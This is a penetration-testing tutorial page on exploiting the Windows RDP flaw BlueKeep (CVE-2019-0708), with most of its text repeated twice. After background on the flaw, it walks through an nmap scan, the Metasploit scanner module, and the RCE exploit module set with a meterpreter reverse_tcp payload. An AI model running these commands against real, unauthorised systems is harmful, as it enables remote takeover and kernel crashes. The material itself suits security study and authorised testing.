Exploiting Windows CVE-2019-0708 RDP Vulnerability (BlueKeep)

CVE-2019-0708 - BlueKeep

BlueKeep (CVE-2019-0708) is the name given to an RDP vulnerability in Windows that could potentially allow attackers to remotely execute arbitrary code and gain access to a Windows system and consequently the network that the target system is a part of.
The BlueKeep vulnerability was made public by Microsoft in May 2019.
The BlueKeep exploit takes advantage of a vulnerability in the Windows RDP protocol that allows attackers to gain access to a chunk of kernel memory consequently allowing them to remotely execute arbitrary code at the system level without authentication.
Microsoft released a patch for this vulnerability on May 14th, 2019 and has urged companies to patch this vulnerability as soon as possible.
At the time of discovery, about 1 million systems worldwide were found to be vulnerable.
The BlueKeep vulnerability affects multiple versions of Windows:
- XP
- Vista
- Windows 7
- Windows Server 2008 & R2
The BlueKeep vulnerability has various illegitimate PoC’s and exploit code that could be malicious in nature. It is therefore recommended to only utilize verified exploit code and modules for exploitation.
The BlueKeep exploit has an MSF auxiliary module that can be used to check if a target system if vulnerable to the exploit and also has an exploit module that can be used to exploit the vulnerability on unpatched systems.
The BlueKeep exploit module can be used to exploit vulnerable Windows systems and consequently provide us with a privileged meterpreter session on the target system.

Note: Targeting Kernel space memory and applications can cause system crashes.

Attack Flow for the Windows CVE-2019-0708 RDP Vulnerability (BlueKeep)

1. Confirm Presence of RDP

Objective: Verify if the target system has RDP (Remote Desktop Protocol) enabled.

Command:

nmap -p 3389 <Target_IP>

Description: Use Nmap to scan port 3389 on the target system to check if RDP service is available.

2. Assess BlueKeep Vulnerability

Objective: Determine if the target system is vulnerable to the BlueKeep vulnerability (CVE-2019-0708).

Command:

msfconsole
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS <Target_IP>
run

Description: Use the cve_2019_0708_bluekeep scanner module in Metasploit to check if the target system is vulnerable to BlueKeep.

3. Exploit BlueKeep Vulnerability

Objective: Exploit the BlueKeep vulnerability to gain remote code execution on the target system.

Command:

msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS <Target_IP>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <Your_IP>
set LPORT <Your_Port>
exploit

Description: Use the cve_2019_0708_bluekeep_rce exploit module in Metasploit to exploit the vulnerability and establish a Meterpreter session.

Note: Targeting Kernel space memory and applications can cause system crashes.

Hacker's Mantra:Everything about Mark Zuckerberg is pure hacker. Hackers don’t take realities of the world for granted; they seek to break and rebuild what they don’t like. They seek to outsmart the world. - Sarah Lacy

PreviousExploiting RDP - Brute Force NextExploiting WinRM

Last updated 9 months ago

Was this helpful?

CVE-2019-0708 - BlueKeep

BlueKeep (CVE-2019-0708) is the name given to an RDP vulnerability in Windows that could potentially allow attackers to remotely execute arbitrary code and gain access to a Windows system and consequently the network that the target system is a part of.

The BlueKeep vulnerability was made public by Microsoft in May 2019.

The BlueKeep exploit takes advantage of a vulnerability in the Windows RDP protocol that allows attackers to gain access to a chunk of kernel memory consequently allowing them to remotely execute arbitrary code at the system level without authentication.

Microsoft released a patch for this vulnerability on May 14th, 2019 and has urged companies to patch this vulnerability as soon as possible.

At the time of discovery, about 1 million systems worldwide were found to be vulnerable.

The BlueKeep vulnerability affects multiple versions of Windows:

XP
Vista
Windows 7
Windows Server 2008 & R2

The BlueKeep vulnerability has various illegitimate PoC’s and exploit code that could be malicious in nature. It is therefore recommended to only utilize verified exploit code and modules for exploitation.

The BlueKeep exploit has an MSF auxiliary module that can be used to check if a target system if vulnerable to the exploit and also has an exploit module that can be used to exploit the vulnerability on unpatched systems.

The BlueKeep exploit module can be used to exploit vulnerable Windows systems and consequently provide us with a privileged meterpreter session on the target system.

Note: Targeting Kernel space memory and applications can cause system crashes.

2. Assess BlueKeep Vulnerability

Objective: Determine if the target system is vulnerable to the BlueKeep vulnerability (CVE-2019-0708).

Command:

msfconsole
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS <Target_IP>
run

Description: Use the cve_2019_0708_bluekeep scanner module in Metasploit to check if the target system is vulnerable to BlueKeep.

3. Exploit BlueKeep Vulnerability

Objective: Exploit the BlueKeep vulnerability to gain remote code execution on the target system.

Command:

msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS <Target_IP>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <Your_IP>
set LPORT <Your_Port>
exploit

Description: Use the cve_2019_0708_bluekeep_rce exploit module in Metasploit to exploit the vulnerability and establish a Meterpreter session.

Note: Targeting Kernel space memory and applications can cause system crashes.

Hacker's Mantra:

Everything about Mark Zuckerberg is pure hacker. Hackers don’t take realities of the world for granted; they seek to break and rebuild what they don’t like. They seek to outsmart the world. - Sarah Lacy